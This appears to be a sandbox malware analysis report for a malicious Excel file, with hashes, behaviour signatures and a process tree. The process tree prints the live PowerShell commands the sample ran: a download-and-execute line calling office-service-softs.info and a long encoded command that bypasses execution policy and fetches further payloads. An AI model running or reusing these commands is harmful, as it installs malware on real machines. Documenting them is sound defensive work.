960682168b2d6bc4518726721741593c127da6787aa2ca768bc31734b5c72579

Analysis

max time kernel
137s
max time network
14s
platform
windows7_x64
resource
win7v200430
submitted
14-07-2020 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Potwierdzenie_transakcji.xls
Size

858KB
MD5

473a9bfb649e3a6bf4341d35b839005a
SHA1

f872b68d9d4ba900481c45662b9c8fe3f9006ec6
SHA256

960682168b2d6bc4518726721741593c127da6787aa2ca768bc31734b5c72579
SHA512

057bb39550bd809aa1235cdbbd457d7bf304088f9442bddf5e2610f498986b880872eac247f5810e7feec32b38b40193309a1b6fce43e2a59ae8a945cffc64dc

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://office-service-softs.info/tech.jpg

Signatures

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
828	EXCEL.EXE
828	EXCEL.EXE
828	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	280	828	powershell.exe	23

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 828 wrote to memory of 280	828	EXCEL.EXE	24
PID 828 wrote to memory of 280	828	EXCEL.EXE	24
PID 828 wrote to memory of 280	828	EXCEL.EXE	24
PID 280 wrote to memory of 1328	280	powershell.exe	26
PID 280 wrote to memory of 1328	280	powershell.exe	26
PID 280 wrote to memory of 1328	280	powershell.exe	26
PID 1328 wrote to memory of 1612	1328	powershell.exe	30
PID 1328 wrote to memory of 1612	1328	powershell.exe	30
PID 1328 wrote to memory of 1612	1328	powershell.exe	30
PID 1328 wrote to memory of 1612	1328	powershell.exe	30
PID 1328 wrote to memory of 1596	1328	powershell.exe	31
PID 1328 wrote to memory of 1596	1328	powershell.exe	31
PID 1328 wrote to memory of 1596	1328	powershell.exe	31
PID 1328 wrote to memory of 1596	1328	powershell.exe	31
PID 1328 wrote to memory of 1636	1328	powershell.exe	32
PID 1328 wrote to memory of 1636	1328	powershell.exe	32
PID 1328 wrote to memory of 1636	1328	powershell.exe	32
PID 1328 wrote to memory of 1636	1328	powershell.exe	32
PID 1328 wrote to memory of 1644	1328	powershell.exe	33
PID 1328 wrote to memory of 1644	1328	powershell.exe	33
PID 1328 wrote to memory of 1644	1328	powershell.exe	33
PID 1328 wrote to memory of 1644	1328	powershell.exe	33
PID 1328 wrote to memory of 1620	1328	powershell.exe	34
PID 1328 wrote to memory of 1620	1328	powershell.exe	34
PID 1328 wrote to memory of 1620	1328	powershell.exe	34
PID 1328 wrote to memory of 1620	1328	powershell.exe	34
PID 1328 wrote to memory of 1568	1328	powershell.exe	35
PID 1328 wrote to memory of 1568	1328	powershell.exe	35
PID 1328 wrote to memory of 1568	1328	powershell.exe	35
PID 1328 wrote to memory of 1568	1328	powershell.exe	35
PID 1328 wrote to memory of 1880	1328	powershell.exe	36
PID 1328 wrote to memory of 1880	1328	powershell.exe	36
PID 1328 wrote to memory of 1880	1328	powershell.exe	36
PID 1328 wrote to memory of 1880	1328	powershell.exe	36
PID 1328 wrote to memory of 1920	1328	powershell.exe	37
PID 1328 wrote to memory of 1920	1328	powershell.exe	37
PID 1328 wrote to memory of 1920	1328	powershell.exe	37
PID 1328 wrote to memory of 1920	1328	powershell.exe	37
PID 1328 wrote to memory of 1916	1328	powershell.exe	38
PID 1328 wrote to memory of 1916	1328	powershell.exe	38
PID 1328 wrote to memory of 1916	1328	powershell.exe	38
PID 1328 wrote to memory of 1916	1328	powershell.exe	38
PID 1328 wrote to memory of 1892	1328	powershell.exe	39
PID 1328 wrote to memory of 1892	1328	powershell.exe	39
PID 1328 wrote to memory of 1892	1328	powershell.exe	39
PID 1328 wrote to memory of 1892	1328	powershell.exe	39
PID 1328 wrote to memory of 1912	1328	powershell.exe	40
PID 1328 wrote to memory of 1912	1328	powershell.exe	40
PID 1328 wrote to memory of 1912	1328	powershell.exe	40
PID 1328 wrote to memory of 1912	1328	powershell.exe	40
PID 1328 wrote to memory of 1888	1328	powershell.exe	41
PID 1328 wrote to memory of 1888	1328	powershell.exe	41
PID 1328 wrote to memory of 1888	1328	powershell.exe	41
PID 1328 wrote to memory of 1888	1328	powershell.exe	41

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	280	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
280	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
828	EXCEL.EXE
828	EXCEL.EXE

Blacklisted process makes network request 5 IoCs

flow	pid	Process
4	280	powershell.exe
8	1328	powershell.exe
9	1328	powershell.exe
11	1328	powershell.exe
13	1328	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
828	EXCEL.EXE

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Potwierdzenie_transakcji.xls
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
PID:828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://office-service-softs.info/tech.jpg')
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  PID:280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAUABzAGIAYgBZAFYAbABiAGsALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQBzAG8AZgB0AHMALgBpAG4AZgBvAC8AcgBuAHAALgB0AHgAdAAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAFQAUwBRAG4AQgB6AEkAQgBhAGUAWgBzAEgAbgBIAG8AaQBRAGIAbwBPAHUAVgBtAFAAUABwAE8ARABvAGYAZwBEAEQAUgBPAEYAZgBBAHYASgBhAHQAWABlAGcAeAB3AG4AWgBpAGsAdABwAG0AbgBDAHEARgBoAGwATQBpAHAASgBZAFEAVgBDAHkAegBTAEkAcQBjAGYAZQB3AHYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAFAAcwBiAGIAWQBWAGwAYgBrACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQBzAG8AZgB0AHMALgBpAG4AZgBvAC8AbQBhAGkAbgAxAC4AdAB4AHQAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAQAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABUAFMAUQBuAEIAegBJAEIAYQBlAFoAcwBIAG4ASABvAGkAUQBiAG8ATwB1AFYAbQBQAFAAcABPAEQAbwBmAGcARABEAFIATwBGAGYAQQB2AEoAYQB0AFgAZQBnAHgAdwBuAFoAaQBrAHQAcABtAG4AQwBxAEYAaABsAE0AaQBwAEoAWQBRAFYAQwB5AHoAUwBJAHEAYwBmAGUAdwB2ACkA
    3⤵
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    PID:1328
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1596
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1636
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1644
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1568
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1880
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1920
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1892
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1888

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads